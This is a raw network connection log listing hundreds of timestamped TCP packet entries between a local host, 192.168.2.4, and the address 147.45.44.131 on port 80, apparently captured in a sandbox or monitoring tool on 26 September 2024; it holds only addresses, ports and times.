Sep 26, 2024 21:06:06.158520937 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.158520937 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.158535004 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158565998 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158598900 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158632040 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158638954 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.158665895 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158698082 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158727884 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.158746958 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158768892 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.158781052 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158813000 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158845901 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158868074 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.158881903 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.158905983 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159025908 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159058094 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159081936 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159090996 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159122944 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159157038 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159159899 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159226894 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159320116 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159352064 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159405947 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159439087 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159470081 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159476995 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159497976 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159502983 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159539938 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159555912 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159568071 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159632921 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159796000 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159827948 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159859896 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159874916 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159893990 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159926891 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159950972 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.159959078 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.159991026 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160010099 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160022974 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160056114 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160073996 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160089970 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160149097 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160307884 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160340071 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160371065 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160403013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160413027 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160435915 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160453081 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160466909 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160501003 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160522938 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160531998 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160564899 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160589933 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160595894 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160629034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160644054 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.160662889 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.160720110 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161016941 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161050081 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161082029 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161104918 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161113977 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161145926 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161168098 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161178112 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161211014 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161242008 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161242008 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161276102 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161294937 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161303043 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161334038 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161356926 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161366940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161398888 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161416054 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161433935 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161469936 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161494017 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161792040 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161823988 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161843061 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161854982 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161887884 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161904097 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161921024 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161952019 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.161966085 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.161983967 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162012100 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162043095 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162045002 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162090063 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162111044 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162122011 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162153959 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162168026 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162185907 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162216902 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162235022 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162251949 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162285089 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162300110 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162317991 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162352085 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162369013 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162769079 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162801981 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162833929 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162839890 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162868023 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162897110 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162900925 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162935019 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.162949085 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.162967920 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163000107 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163022995 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.163032055 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163065910 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163077116 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.163099051 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163130999 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163157940 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.163161993 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163196087 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163212061 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.163229942 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163261890 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163280010 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.163295984 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163328886 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.163347960 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.184004068 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184070110 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184103966 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184135914 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184190989 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184238911 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184273005 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184286118 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.184287071 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.184287071 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.184304953 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184338093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184356928 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.184370995 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184392929 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.184405088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184437037 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184468985 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184500933 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.184693098 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.184693098 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.225361109 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251084089 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251151085 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251203060 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251205921 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251235962 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251270056 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251290083 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251319885 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251355886 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251373053 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251414061 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251457930 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251466990 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251491070 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251524925 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251538038 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251558065 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251593113 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251615047 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251643896 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251678944 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251696110 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251710892 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251745939 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251769066 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251777887 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251840115 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251868963 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251905918 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251939058 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.251959085 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.251975060 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252023935 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252079010 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252110958 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252142906 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252161026 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252175093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252207041 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252228975 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252238035 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252270937 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252293110 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252301931 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252334118 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252353907 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252367020 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252419949 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252532959 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252568007 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252618074 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252684116 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252717018 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252764940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252767086 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252798080 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252830982 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252844095 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252862930 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252897978 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252928019 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252931118 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252964973 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.252985954 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.252996922 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253030062 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253045082 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253062010 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253094912 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253123999 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253545046 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253577948 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253602028 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253611088 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253638983 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253658056 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253674984 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253705978 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253721952 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253740072 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253771067 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253796101 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253803015 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253834963 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253848076 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253866911 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253901005 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253918886 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253931999 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253966093 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.253983021 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.253997087 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254029989 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254051924 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254065037 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254108906 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254462004 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254494905 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254527092 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254544973 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254558086 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254590034 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254609108 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254621983 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254656076 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254673958 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254688025 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254719973 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254739046 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254750013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254782915 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254802942 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254812956 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254847050 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254859924 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254882097 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254914999 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254939079 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.254946947 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254978895 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.254995108 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255012035 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255064011 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255424976 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255456924 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255501032 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255505085 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255538940 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255569935 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255583048 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255603075 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255635023 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255649090 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255669117 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255702019 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255719900 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255733013 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255764961 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255779982 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255796909 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255827904 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255842924 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255861044 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255896091 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255908012 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255928993 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255961895 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.255980968 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.255996943 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.256046057 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.274604082 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274671078 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274705887 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274713993 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.274739981 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274791956 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274804115 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.274844885 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274880886 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274900913 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.274909973 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274950027 CEST	80	49730	147.45.44.131	192.168.2.4
Sep 26, 2024 21:06:06.274961948 CEST	49730	80	192.168.2.4	147.45.44.131
Sep 26, 2024 21:06:06.274982929 CEST	80	49730	147.45.44.131	192.168.2.4
